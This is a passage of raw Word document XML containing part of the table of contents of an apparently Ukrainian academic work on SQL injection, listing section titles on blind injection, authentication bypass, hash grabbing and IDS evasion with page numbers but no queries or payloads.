              </w:rPr>
              <w:t>Based</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>-ін’єкцій: використовуючи збережені процедури</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_Toc30433125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43</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0682E2F8" w14:textId="0177D337" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="31"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433126" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>2.6.4 Обхід автентифікації веб сайту використовуючи SQL-ін’єкцію</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_Toc30433126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43</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="664A09A0" w14:textId="00FA25F1" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="31"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433127" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve">2.6.5 </w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Blind SQL</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>-ін’єкція</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Extract Database User</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_Toc30433127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44</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="41602E8B" w14:textId="3864329B" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="31"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433128" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve">2.6.6 Виконання </w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Double</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Blind</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Injection</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Класична експлуатація (</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>MySQL</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>)</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_Toc30433128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44</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="21E66829" w14:textId="2E24002E" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="31"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433129" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>2.6.7 Використання ін'єкції SQL другого порядку</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_Toc30433129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45</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1F36A252" w14:textId="66B60F7B" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="31"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433130" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve">2.6.8 Використання сканерів вразливостей для знаходження </w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>-ін’єкцій</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_Toc30433130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46</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0DFDEAD3" w14:textId="324E1929" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433131" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>2.7</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Advanced SQL Injection</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_Toc30433131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56</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="61265B9F" w14:textId="040D11E5" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="31"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433132" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve">2.7.1 </w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Advanced Enumeration</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_Toc30433132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57</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1795BABB" w14:textId="6D1EEEA5" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="31"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433133" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve">2.7.2 </w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Password Grabbing</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_Toc30433133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57</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="662954D9" w14:textId="5928F703" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="31"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433134" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve">2.7.3 </w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Grabbing SQL Server Hashes</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_Toc30433134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57</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5AA8FC85" w14:textId="4AE18A47" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="31"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433135" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve">2.7.4 </w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Transfer Database to Attacker</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>`</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>s Machine</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_Toc30433135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58</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1FEC658B" w14:textId="3B087FAE" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="31"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433136" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve">2.7.5 </w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Network Reconnaissance Full Query</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_Toc30433136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58</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4B003633" w14:textId="5D39579B" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433137" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>2.8</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion Techniques</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_Toc30433137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58</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="622C1EEA" w14:textId="157A9FA5" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="31"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433138" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve">2.8.1 </w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Evading </w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>IDS</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_Toc30433138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59</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="51AACF6C" w14:textId="280DB630" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="31"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433139" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>2.8.2</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> In-line Comment</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_Toc30433139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59</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="20E448F7" w14:textId="5582287A" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="31"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433140" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve">2.8.3 </w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>String</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>concatenation</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_Toc30433140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60</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="70CFE054" w14:textId="70CA6D93" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="31"/>
            <w:tabs>
